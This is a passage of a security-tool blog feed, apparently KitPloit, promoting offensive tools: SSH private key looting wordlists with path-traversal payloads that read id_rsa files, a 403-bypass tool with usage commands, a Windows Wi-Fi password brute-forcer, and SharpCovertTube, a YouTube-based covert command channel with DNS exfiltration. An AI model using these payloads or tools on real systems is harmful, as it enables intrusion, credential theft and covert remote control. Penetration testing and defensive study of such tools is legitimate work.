src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/some-tweak-to-hide-jwt-payload-values" rel="nofollow" target="_blank" title="Download Some-Tweak-To-Hide-Jwt-Payload-Values">Download Some-Tweak-To-Hide-Jwt-Payload-Values</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73888386767938395432024-03-09T08:30:00.001-03:002024-03-09T08:30:00.242-03:00SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/s897/SSH%20Private%20Key%20Looting%20Wordlists.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/w640-h362/SSH%20Private%20Key%20Looting%20Wordlists.png" width="640" /></a></div><p><br /></p><p>SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>LFI for Lateral Movement? Gain SSH Access?</b></span><br /> <pre><code>?file=../../../../../../../../home/user/.ssh/id_rsa<br />?file=../../../../../../../../home/user/.ssh/id_rsa-cert<br /></code></pre> <br /><span style="font-size: x-large;"><b>SSH Private Key Looting <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="Wordlists">Wordlists</a> 🔒🗝️</b></span><br /> <p>This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.</p> <br /><span style="font-size: large;"><b>Wordlist Files 📝</b></span><br /> <ul> <li><strong>ssh-priv-key-loot-common.txt</strong>: Default and common naming conventions for SSH private key files.</li> <li><strong>ssh-priv-key-loot-medium.txt</strong>: Probable file names without backup file extensions.</li> <li><strong>ssh-priv-key-loot-extended.txt</strong>: Probable file names with backup file extensions.</li> <li><strong>ssh-priv-key-loot-*_w_gui.txt</strong>: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.</li> </ul> <br /><span style="font-size: large;"><b>Usage 🚀</b></span><br /> <p>These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> tool that supports custom wordlists. They can help expand the scope of your brute-forcing or <a href="https://www.kitploit.com/search/label/Enumeration" target="_blank" title="enumeration">enumeration</a> efforts when targeting SSH private key files.</p> <br /><span style="font-size: large;"><b>Acknowledgements 🙏</b></span><br /> <p>This <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> repository was inspired by John Hammond in his vlog "<a href="https://www.youtube.com/watch?v=2rqb3YSa1SE" rel="nofollow" target="_blank" title="Don't Forget This One">Don't Forget This One </a><a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="Hacking">Hacking</a> Trick." </p> <br /><span style="font-size: large;"><b>Disclaimer ⚠️</b></span><br /> <p>Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/SSH-Private-Key-Looting-Wordlists" rel="nofollow" target="_blank" title="Download SSH-Private-Key-Looting-Wordlists">Download SSH-Private-Key-Looting-Wordlists</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-58469355253761489642024-03-08T17:36:00.003-03:002024-03-08T17:36:22.430-03:00Nomore403 - Tool To Bypass 403/40X Response Codes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/s1233/Nomore403.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1233" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/w640-h218/Nomore403.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div> <p><code>nomore403</code> is an innovative tool designed to help <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, <code>nomore403</code> automates various <a href="https://www.kitploit.com/search/label/Techniques" target="_blank" title="techniques">techniques</a> to seamlessly navigate past these access restrictions, offering a broad range of strategies from header <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> to method tampering.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Prerequisites</b></span><br /> <p>Before you install and run <code>nomore403</code>, make sure you have the following: - Go 1.15 or higher installed on your machine.</p> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>From Releases</b></span><br /> <p>Grab the latest release for your OS from our <a href="https://github.com/devploit/nomore403/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page.</p> <br /><span style="font-size: large;"><b>Compile from Source</b></span><br /> <p>If you prefer to compile the tool yourself:</p> <pre><code>git clone https://github.com/devploit/nomore403<br />cd nomore403<br />go get<br />go build<br /></code></pre> <br /><span style="font-size: x-large;"><b>Customization</b></span><br /> <p>To edit or add new bypasses, modify the payloads directly in the <a href="https://github.com/devploit/nomore403/tree/main/payloads" rel="nofollow" target="_blank" title="payloads">payloads</a> folder. nomore403 will automatically incorporate these changes.</p> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Output example</b></span><br /> <pre><code> ________ ________ ________ ________ ________ ________ ________ ________ ________<br /> ╱ ╱ ╲╱ ╲╱ ╱ ╲╱ ╲╱ ╲╱ ╲╱ ╱ ╲╱ ╲╱__ ╲<br /> ╱ ╱ ╱ ╱ ╱ ╱ ╱ ╱ ╱ __╱ ╱ ╱ ╱__ ╱<br /> ╱ ╱ ╱ ╱ ╱ _╱ __/____ ╱ ╱ ╱<br /> ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱ ╱____╱╲________╱╲________╱ <br /><br />Target: https://domain.com/admin<br />Headers: false<br />Proxy: false<br />User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)<br />Method: GET<br />Payloads folder: payloads<br />Custom bypass IP: false<br />Follow Redirects: false<br />Rate Limit detection: false<br />Verbose: false<br /><br />━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━<br />403 429 bytes https://domain.com/admin<br /><br />━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━<br /><br />━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━<br /><br />━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━<br />200 2047 bytes https://domain.com/;///..admin<br /><br />━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━<br />403 429 bytes HTTP/1.0<br />403 429 bytes HTTP/1.1<br />403 429 bytes HTTP/2<br /><br />━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━<br />200 2047 bytes https://domain.com/%61dmin<br /></code></pre> <br /><span style="font-size: large;"><b>Basic Usage</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin<br /></code></pre> <br /><span style="font-size: large;"><b>Verbose Mode + Proxy</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v<br /></code></pre> <br /><span style="font-size: large;"><b>Parse request from Burp</b></span><br /> <pre><code>./nomore403 --request-file request.txt<br /></code></pre> <br /><span style="font-size: large;"><b>Use <a href="https://www.kitploit.com/search/label/Custom%20Header" target="_blank" title="custom header">custom header</a> + specific IP address for bypasses</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8<br /></code></pre> <br /><span style="font-size: large;"><b>Set new max of goroutines + add delay between requests</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -m 10 -d 200<br /></code></pre> <br /><span style="font-size: x-large;"><b>Options</b></span><br /> <pre><code>./nomore403 -h<br />Command line application that automates different ways to bypass 40X codes.<br /><br />Usage:<br /> nomore403 [flags]<br /><br />Flags:<br /> -i, --bypass-ip string Use a specified IP address or hostname for <a href="https://www.kitploit.com/search/label/Bypassing" target="_blank" title="bypassing">bypassing</a> access controls. Injects this IP in headers like 'X-Forwarded-For'.<br /> -d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).<br /> -f, --folder string Specify the folder location for payloads if not in the same directory as the executable.<br /> -H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers.<br /> -h, --help help for nomore403<br /> --http Use HTTP instead of HTTPS for requests defined in the request file.<br /> -t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.<br /> -m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50)<br /> --no-banner Disable the display of the startup banner (default: banner shown).<br /> -x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'.<br /> --random-agent Enable the use of a randomly selected User-Agent.<br /> -l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code.<br /> -r, --redirect Automatically follow redirects in responses.<br /> --request-file string Load request configuration and flags from a specified file.<br /> -u, --uri string Specify the target URL for the request.<br /> -a, --user-agent string pecify a custom User-Agent string for requests (default: 'nomore403').<br /> -v, --verbose Enable verbose output for detailed request/response logging.<br /></code></pre> <br /><span style="font-size: x-large;"><b>Contributing</b></span><br /> <p>We welcome contributions of all forms. Here's how you can help:</p> <ul> <li>Report bugs and suggest features.</li> <li>Submit pull requests with bug fixes and new features.</li> </ul> <br /><span style="font-size: x-large;"><b>Security Considerations</b></span><br /> <p>While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.</p> <br /><span style="font-size: x-large;"><b>License</b></span><br /> <p>nomore403 is released under the MIT License. See the <a href="https://github.com/devploit/dontgo403/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br /><span style="font-size: x-large;"><b>Contact</b></span><br /> <p><a href="https://twitter.com/devploit/" rel="nofollow" target="_blank" title="Tool to bypass 403/40X response codes. (10)"><img alt="Tool to bypass 403/40X response codes. (3)" src="https://img.shields.io/badge/-Twitter-blue?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/devploit/" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/devploit/nomore403" rel="nofollow" target="_blank" title="Download Nomore403">Download Nomore403</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-43932165222763295862024-03-07T08:30:00.007-03:002024-03-07T08:30:00.234-03:00WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p><pre><br /></pre> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The packages are minimal or nearly none 😅. The package install command is:</p> <pre><code>pip install rich pyfiglet<br /></code></pre> <p>Thats it.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em></li> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability</li> <li><em>Code-Wise Features:</em></li> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>versatility in using interface, targets, and password files.</li> </ul> <br /><span style="font-size: large;"><b>How it works</b></span><br /> <p>So this is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640" /></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-Fi</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How to run this</b></span><br /> <p style="text-align: left;">After installing all the packages just run <code>python main.py</code> rest is <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a> 👍 make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:</p><p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <br /><span style="font-size: large;"><b>Contributions</b></span><br /> <p>For contributions: - <em>First Clone:</em> First Clone the repo into your dev env and do the edits. - <em>Comments:</em> I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - <em>Submit:</em> Submit a PR for me to verify the changes and apprive it if necessary.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35201542899401210172024-03-06T08:30:00.022-03:002024-03-06T08:30:00.127-03:00SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p><br /> <p>SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.</p> <p>The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The <a href="https://www.kitploit.com/search/label/QR%20codes" target="_blank" title="QR codes">QR codes</a> in the videos can use cleartext or AES-encrypted values.</p> <p>It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a <a href="https://www.kitploit.com/search/label/Persistence" target="_blank" title="persistence">persistence</a> method using only web requests to the Google API.</p><span><a name='more'></a></span><p><br /></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Run the <a href="https://www.kitploit.com/search/label/Listener" target="_blank" title="listener">listener</a> in your Windows system:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o"><img alt="" border="0" height="63" id="BLOGGER_PHOTO_ID_7343001700687977618" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o=w640-h63" width="640" /></a></p> <p>It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a>:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7343001706210908002" src="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo=w496-h640" width="496" /></a></p> <p>After finding there is a <a href="https://www.youtube.com/shorts/-JcDf4pF0qA" rel="nofollow" target="_blank" title="new video">new video</a> in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0"><img alt="" border="0" height="154" id="BLOGGER_PHOTO_ID_7343001709859404242" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0=w640-h154" width="640" /></a></p> <p>This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a> is uploaded and the content of c:\temp is exfiltrated using several DNS queries:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343001717962333954" src="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8=w640-h412" width="640" /></a></p> <p>Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> is also optional and can be tested using Burp's collaborator:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo"><img alt="" border="0" height="108" id="BLOGGER_PHOTO_ID_7343001721497621394" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo=w640-h108" width="640" /></a></p> <p>As an alternative, I created <a href="https://github.com/ricardojoserf/dns-exfiltration" rel="nofollow" target="_blank" title="this repository">this repository</a> with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.</p> <br /><span style="font-size: large;"><b>Configuration</b></span><br /> <p>There are some values you can change, you can find them in Configuration.cs file for the <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube/Configuration.cs" rel="nofollow" target="_blank" title="regular binary">regular binary</a> and <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube_Service/Configuration.cs" rel="nofollow" target="_blank" title="the service binary">the service binary</a>. Only the first two have to be updated:</p> <ul> <li><strong>channel_id</strong> (Mandatory!!!): Get your Youtube channel ID from <a href="https://www.youtube.com/account_advanced" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>api_key</strong> (Mandatory!!!): To get the API key create an application and generate the key from <a href="https://console.cloud.google.com/apis/credentials" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>payload_aes_key</strong> (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.</li> <li><strong>payload_aes_iv</strong> (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.</li> <li><strong>seconds_delay</strong> (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.</li> <li><strong>debug_console</strong> (Optional. Default: true): Show debug messages in console or not.</li> <li><strong>log_to_file</strong> (Optional. Default: true): Write debug messages in log file or not.</li> <li><strong>log_file</strong> (Optional. Default: 